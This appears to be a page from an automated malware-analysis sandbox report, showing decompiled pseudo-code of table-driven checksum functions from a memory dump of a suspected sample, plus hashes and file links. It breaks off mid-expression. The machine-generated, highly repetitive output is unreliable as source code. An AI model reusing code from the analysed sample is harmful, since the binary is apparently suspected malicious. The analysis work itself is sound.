*(0x41ceb0 + (_t223 >> 0x18) * 4) ^  *(0x41c2b0 + (_t223 & 0x000000ff) * 4) ^  *(_t102 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t181 >> 0x18) * 4) ^  *(0x41c2b0 + (_t181 & 0x000000ff) * 4) ^  *(_t103 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (( *(0x41cab0 + (( *(0x41cab0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t223 >> 0x18) * 4) ^  *(0x41c2b0 + (_t223 & 0x000000ff) * 4) ^  *(_t102 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t223 >> 0x18) * 4) ^  *(0x41c2b0 + (_t223 & 0x000000ff) * 4) ^  *(_t102 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t181 >> 0x18) * 4) ^  *(0x41c2b0 + (_t181 & 0x000000ff) * 4) ^  *(_t103 - 8)) >> 0x18) * 4) ^  *(0x41c2b0 + (_t232 & 0x000000ff) * 4) ^  *(_t103 - 4);
						_t89 =  &(_t103[1]);
						_t241 =  *(0x41cab0 + (_t190 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (_t190 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t190 >> 0x18) * 4) ^  *(0x41c2b0 + (_t190 & 0x000000ff) * 4) ^  *(_t89 - 4);
						_t266 = _t266 - 0x20;
						_t208 =  *(0x41cab0 + (( *(0x41cab0 + (( *(0x41cab0 + (_t190 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (_t190 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t190 >> 0x18) * 4) ^  *(0x41c2b0 + (_t190 & 0x000000ff) * 4) ^  *(_t89 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (_t190 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (_t190 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t190 >> 0x18) * 4) ^  *(0x41c2b0 + (_t190 & 0x000000ff) * 4) ^  *(_t89 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t241 >> 0x18) * 4) ^  *(0x41c2b0 + (_t241 & 0x000000ff) * 4) ^  *_t89) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + (_t190 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (_t190 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t190 >> 0x18) * 4) ^  *(0x41c2b0 + (_t190 & 0x000000ff) * 4) ^  *(_t89 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (_t190 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (_t190 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t190 >> 0x18) * 4) ^  *(0x41c2b0 + (_t190 & 0x000000ff) * 4) ^  *(_t89 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t241 >> 0x18) * 4) ^  *(0x41c2b0 + (_t241 & 0x000000ff) * 4) ^  *_t89) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (( *(0x41cab0 + (( *(0x41cab0 + (_t190 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (_t190 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t190 >> 0x18) * 4) ^  *(0x41c2b0 + (_t190 & 0x000000ff) * 4) ^  *(_t89 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (_t190 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (_t190 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t190 >> 0x18) * 4) ^  *(0x41c2b0 + (_t190 & 0x000000ff) * 4) ^  *(_t89 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t241 >> 0x18) * 4) ^  *(0x41c2b0 + (_t241 & 0x000000ff) * 4) ^  *_t89) >> 0x18) * 4) ^  *(0x41c2b0 + (_t199 & 0x000000ff) * 4);
						_t264 = _t264 - 1;
					} while (_t264 != 0);
				}
				if(_t266 >= 4) {
					_t164 = _t266 >> 2;
					do {
						_t212 = _t208 ^ _t89[1];
						_t89 =  &(_t89[1]);
						_t266 = _t266 - 4;
						_t164 = _t164 - 1;
						_t208 =  *(0x41cab0 + (_t212 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (_t212 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t212 >> 0x18) * 4) ^  *(0x41c2b0 + (_t212 & 0x000000ff) * 4);
					} while (_t164 != 0);
				}
				_t90 =  &(_t89[1]);
				if(_t266 != 0) {
					do {
						_t208 = _t208 << 0x00000008 ^  *(0x41c2b0 + (_t208 >> 0x00000018 ^  *_t90 & 0x000000ff) * 4);
						_t90 =  &(_t90[1]);
						_t266 = _t266 - 1;
					} while (_t266 != 0);
				}
				return (( !_t208 & 0x0000ff00) + ( !_t208 << 0x10) << 8) + ( !_t208 >> 0x00000008 & 0x0000ff00) + (_t209 >> 0x18);
			}

0x00402b90
0x00402b91
0x00402bb8
0x00402bbc
0x00402bc0
0x00402bd2
0x00402bd9
0x00402bda
0x00402bdd
0x00000000
0x00000000
0x00000000
0x00402bdd
0x00402bc0
0x00402bdf
0x00402be0
0x00402be6
0x00402bee
0x00402bf1
0x00402bf1
0x00402c34
0x00402c37
0x00402c79
0x00402c7c
0x00402cbf
0x00402cc2
0x00402cc5
0x00402d45
0x00402d85
0x00402d88
0x00402d8b
0x00402e03
0x00402e0a
0x00402e0a
0x00402bf1
0x00402e16
0x00402e1a
0x00402e20
0x00402e20
0x00402e23
0x00402e63
0x00402e66
0x00402e69
0x00402e69
0x00402e20
0x00402e6d
0x00402e73
0x00402e75
0x00402e82
0x00402e89
0x00402e8a
0x00402e8a
0x00402e75
0x00402eb6

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
Instruction ID: 74c1b90a01db230de662c72faab58802bb742d928f34651097fec506a9751401
Opcode Fuzzy Hash: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
Instruction Fuzzy Hash: 15717072A9155347E39CCF5CECD17763713DBC5351F49C23ACA025B6EAC938A922C688

Uniqueness

Uniqueness Score: -1.00%

Function 004028B0, Relevance: .2, Instructions: 184
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004028B0(signed int __eax, signed char __ecx, unsigned int __edx) {
				signed int _t87;
				signed int _t90;
				signed int _t119;
				signed char _t175;
				void* _t177;
				void* _t179;
				void* _t181;
				void* _t182;
				unsigned int _t188;
				unsigned int _t238;
				unsigned int _t239;

				_t175 = __ecx;
				_t239 = __edx;
				_t87 =  !__eax;
				if(__edx != 0) {
					while((_t175 & 0x00000003) != 0) {
						_t87 = _t87 >> 0x00000008 ^  *(0x41b2b0 + (( *_t175 & 0x000000ff ^ _t87) & 0x000000ff) * 4);
						_t175 = _t175 + 1;
						_t239 = _t239 - 1;
						if(_t239 != 0) {
							continue;
						}
						goto L4;
					}
				}
				L4:
				if(_t239 >= 0x20) {
					_t238 = _t239 >> 5;
					do {
						_t92 = _t87 ^  *_t175;
						_t177 = _t175 + 8;
						_t196 =  *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4);
						_t179 = _t177 + 8;
						_t101 =  *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8);
						_t181 = _t179 + 8;
						_t214 =  *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x18) * 4) ^  *(0x41beb0 + (_t205 & 0x000000ff) * 4) ^  *(_t181 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x18) * 4) ^  *(0x41beb0 + (_t205 & 0x000000ff) * 4) ^  *(_t181 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 